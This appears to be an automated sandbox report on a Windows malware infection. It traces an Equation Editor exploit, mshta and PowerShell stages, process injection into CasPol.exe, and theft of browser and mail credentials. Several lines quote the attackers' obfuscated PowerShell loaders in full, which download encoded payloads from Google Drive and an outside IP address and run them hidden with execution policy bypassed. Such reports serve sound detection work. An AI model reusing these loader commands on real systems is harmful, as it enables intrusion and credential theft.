                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,20_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_10006580 FindFirstFileExA,20_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0040AE51 FindFirstFileW,FindNextFileW,22_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,20_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00418981 memset,GetSystemInfo,22_2_00418981
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,22_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00443355 mov eax, dword ptr fs:[00000030h]20_2_00443355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_10004AB4 mov eax, dword ptr fs:[00000030h]20_2_10004AB4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,20_2_00411D39
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00434BD8 SetUnhandledExceptionFilter,20_2_00434BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0043BB71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_100060E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_10002639
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_10002B1C

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,20_2_0041812A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 459000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 471000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 477000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 478000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 479000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47E000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe20_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00419662 mouse_event,20_2_00419662
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'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'+[cHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8872.tmp" "c:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\yycdupifp"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\jsiovitzdbnf"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jezym0s5rdc1tktmicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhrgqtdhlqrsagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfzklosvrjb04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtt04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagagnry1boyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagigfxskxtau8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbtugl1vmssdwludcagicagicagicagicagicagicagicagicagicagicagtxz1bmphz0rwleludfb0ciagicagicagicagicagicagicagicagicagicagicagyut4u2tndugpoycgicagicagicagicagicagicagicagicagicagicagic1uqu1ficagicagicagicagicagicagicagicagicagicagicaiciigicagicagicagicagicagicagicagicagicagicagic1oqu1lc1bhy2ugicagicagicagicagicagicagicagicagicagicagied4zvnnvkjxicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakrlgzszlenzvos2y6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly84ns4ymtuumja2ljgylzi3mc9pz2v0ymvzdhroaw5nc3dpdghizxn0cgljdhvyzxdpdghncmvhdhroaw5nc29ubwuudelgiiwijevudjpbufbeqvrbxgdldgjlc3r0agluz3n3axroymvzdhbpy3r1cmv3axroz3jlyxr0agluz3nvbi52ylmildasmck7u3rbclqtu2xlrvaomyk7u1rbunqgicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcz2v0ymvzdhroaw5nc3dpdghizxn0cgljdhvyzxdpdghncmvhdhroaw5nc29ulnziuyi='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('aukimageurl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur zts;'+'aukwebclient = new-object system.net.webclient;aukimagebytes = aukw'+'ebclient.downloaddata(aukimageurl);aukimagetex'+'t = [system.text.encoding]::utf8.getstring(aukimagebytes);aukstartflag = zts<<base64_start>>zts;aukendflag'+' = zts<<base64_end>>zts;aukstartindex = aukimagetext.indexof(aukstartflag);aukendindex = aukimagetext.indexof(aukendflag);aukstartindex -ge 0 -and aukendindex -gt'+' '+'aukstartindex;aukst'+'artindex += aukstartflag.leng'+'th;aukbase64length = aukendindex - aukstartindex;aukba'+'se64command = aukimagetext.substring(aukstartindex, aukbase64length);aukbase64reversed = -join (aukbase64command.tochararray() drb foreach-object { auk_ })[-1..-(aukbase64command.length)];aukcommandbytes = [system.convert]'+'::frombas'+'e64string(aukbase64reversed);aukloadedassembly = [system.reflection.assembly]'+'::load(aukcommandbytes);aukvaimethod = [dnlib.io.home].getmet'+'hod(ztsvaizts);aukvaime'+'thod.invoke(auknull, @(z'+'tstxt.ecdffrw/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztscaspolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replace('auk','$').replace('zts',[string][char]39).replace('drb','|')| . ( $pshome[21]+$pshome[34]+'x')"
                  Source: CasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChrome[Compatibility Mode] - Microsoft Word:
                  Source: CasPol.exe, 00000014.00000002.696739186.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: logs.dat.20.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00434CB6 cpuid 20_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,20_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,20_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,20_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,20_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,20_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,20_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,20_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,GetLocaleInfoW,20_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,20_2_00451FD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_004489D7 GetSystemTimeAsFileTime,20_2_004489D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041B69E GetComputerNameExW,GetUserNameW,20_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,20_2_00449210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0041739B GetVersionExW,22_2_0041739B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\wordse\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 20_2_0040BA4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 20_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: \key3.db 20_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
